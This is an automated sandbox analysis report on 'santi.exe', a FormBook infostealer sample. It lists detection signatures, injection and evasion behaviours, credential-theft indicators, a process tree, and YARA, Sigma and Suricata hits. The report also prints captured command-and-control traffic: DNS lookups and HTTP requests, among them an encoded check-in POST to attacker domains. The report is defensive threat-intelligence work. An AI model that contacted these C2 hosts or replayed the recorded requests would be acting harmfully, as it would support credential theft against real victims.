Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
santi.exe

Overview

General Information

Sample name:santi.exe
Analysis ID:1561742
MD5:c086de804062f1c6ebf2e42057187b24
SHA1:8f57ba2121877ecae5a800b28f2fc89421485d1f
SHA256:a538495e66f9396821392539284e4752ef3569f1d1f7b592cb438908b6c93efa
Tags:exeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • santi.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\santi.exe" MD5: C086DE804062F1C6EBF2E42057187B24)
    • svchost.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\santi.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • lavilIyGJqg.exe (PID: 1292 cmdline: "C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msdt.exe (PID: 7696 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)
          • lavilIyGJqg.exe (PID: 520 cmdline: "C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7960 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.6f0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.6f0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\santi.exe", CommandLine: "C:\Users\user\Desktop\santi.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\santi.exe", ParentImage: C:\Users\user\Desktop\santi.exe, ParentProcessId: 6336, ParentProcessName: santi.exe, ProcessCommandLine: "C:\Users\user\Desktop\santi.exe", ProcessId: 7296, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\santi.exe", CommandLine: "C:\Users\user\Desktop\santi.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\santi.exe", ParentImage: C:\Users\user\Desktop\santi.exe, ParentProcessId: 6336, ParentProcessName: santi.exe, ProcessCommandLine: "C:\Users\user\Desktop\santi.exe", ProcessId: 7296, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:35:06.513368+010028563181A Network Trojan was detected192.168.2.749849104.18.73.11680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: santi.exeReversingLabs: Detection: 60%
                Source: santi.exeVirustotal: Detection: 47%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: santi.exeJoe Sandbox ML: detected
                Source: santi.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: msdt.pdbGCTL source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lavilIyGJqg.exe, 0000000A.00000002.3129958967.00000000009CE000.00000002.00000001.01000000.00000005.sdmp, lavilIyGJqg.exe, 0000000C.00000000.1798745572.00000000009CE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: msdt.pdb source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00326CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00326CA9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003260DD
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003263F9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0032EB60
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032F56F FindFirstFileW,FindClose,0_2_0032F56F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0032F5FA
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00331B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00331B2F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00331C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00331C8A
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00331F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00331F94
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0042C730 FindFirstFileW,FindNextFileW,FindClose,11_2_0042C730
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then xor eax, eax11_2_00419DF0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi11_2_0041E409
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then mov ebx, 00000004h11_2_043A04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49849 -> 104.18.73.116:80
                Source: Joe Sandbox ViewIP Address: 104.18.73.116 104.18.73.116
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00334EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00334EB5
                Source: global trafficHTTP traffic detected: GET /lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MH HTTP/1.1Host: www.n-vis.groupAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficHTTP traffic detected: GET /uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficHTTP traffic detected: GET /o7bo/?jp30l4Dh=rSNp7HYcuB/095ykRTgGSysZZq4Xde7QSp6ZurvXibSiMmwLx7Dds9OPAwuR2izgPvluyMujHD+7ybxpuR33pblwowpnCmWgEXw5Rhc3WsmHQKO6UjX33qMhz5kj31YRr7iTj/VwMpww&Yh8=pl0prhRpj HTTP/1.1Host: www.dialagiaja18.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficHTTP traffic detected: GET /vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpj HTTP/1.1Host: www.395608.menAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficHTTP traffic detected: GET /zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpj HTTP/1.1Host: www.gkfundeis.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficHTTP traffic detected: GET /ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpj HTTP/1.1Host: www.incgruporxat.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficHTTP traffic detected: GET /oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8s HTTP/1.1Host: www.holytur.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficHTTP traffic detected: GET /qp0h/?jp30l4Dh=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IEMb3TN5ZVyBIh4N3fT3PNmVkN2Qc3E0TfDZCxTFFsCUQYSNOCPRw5FgL&Yh8=pl0prhRpj HTTP/1.1Host: www.lirio.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                Source: global trafficDNS traffic detected: DNS query: www.n-vis.group
                Source: global trafficDNS traffic detected: DNS query: www.losmason.shop
                Source: global trafficDNS traffic detected: DNS query: www.dialagiaja18.buzz
                Source: global trafficDNS traffic detected: DNS query: www.395608.men
                Source: global trafficDNS traffic detected: DNS query: www.gkfundeis.net
                Source: global trafficDNS traffic detected: DNS query: www.incgruporxat.click
                Source: global trafficDNS traffic detected: DNS query: www.holytur.net
                Source: global trafficDNS traffic detected: DNS query: www.lirio.shop
                Source: global trafficDNS traffic detected: DNS query: www.espiritismo.info
                Source: unknownHTTP traffic detected: POST /uktz/ HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.losmason.shopReferer: http://www.losmason.shop/uktz/Content-Length: 221Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5Data Raw: 6a 70 33 30 6c 34 44 68 3d 75 50 47 30 48 47 32 56 76 2b 44 65 62 50 6c 79 44 62 58 39 52 66 43 70 73 46 4d 6d 77 32 74 34 79 6e 46 6c 44 7a 51 55 4f 70 42 73 45 68 50 6d 6b 42 56 4e 64 4a 66 67 43 4c 68 65 69 53 7a 6c 43 33 47 6b 4d 4d 70 4b 78 67 51 50 71 4d 75 6f 50 50 77 4b 76 31 68 46 2b 50 5a 41 4f 44 4f 66 51 72 57 62 76 5a 36 4c 48 52 56 44 41 53 78 71 47 52 4e 73 46 36 4d 42 67 55 45 72 7a 50 70 37 50 38 64 47 46 56 49 43 52 58 63 7a 72 36 43 64 62 65 49 55 6b 4f 41 73 36 33 76 73 65 5a 4c 34 58 63 75 6c 42 37 4a 72 71 62 47 46 50 4d 30 54 73 63 47 6f 7a 41 77 2b 6d 34 75 35 45 35 55 79 74 58 51 77 74 34 6a 46 4e 72 66 33 6d 46 50 53 59 77 3d 3d Data Ascii: jp30l4Dh=uPG0HG2Vv+DebPlyDbX9RfCpsFMmw2t4ynFlDzQUOpBsEhPmkBVNdJfgCLheiSzlC3GkMMpKxgQPqMuoPPwKv1hF+PZAODOfQrWbvZ6LHRVDASxqGRNsF6MBgUErzPp7P8dGFVICRXczr6CdbeIUkOAs63vseZL4XculB7JrqbGFPM0TscGozAw+m4u5E5UytXQwt4jFNrf3mFPSYw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:21 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
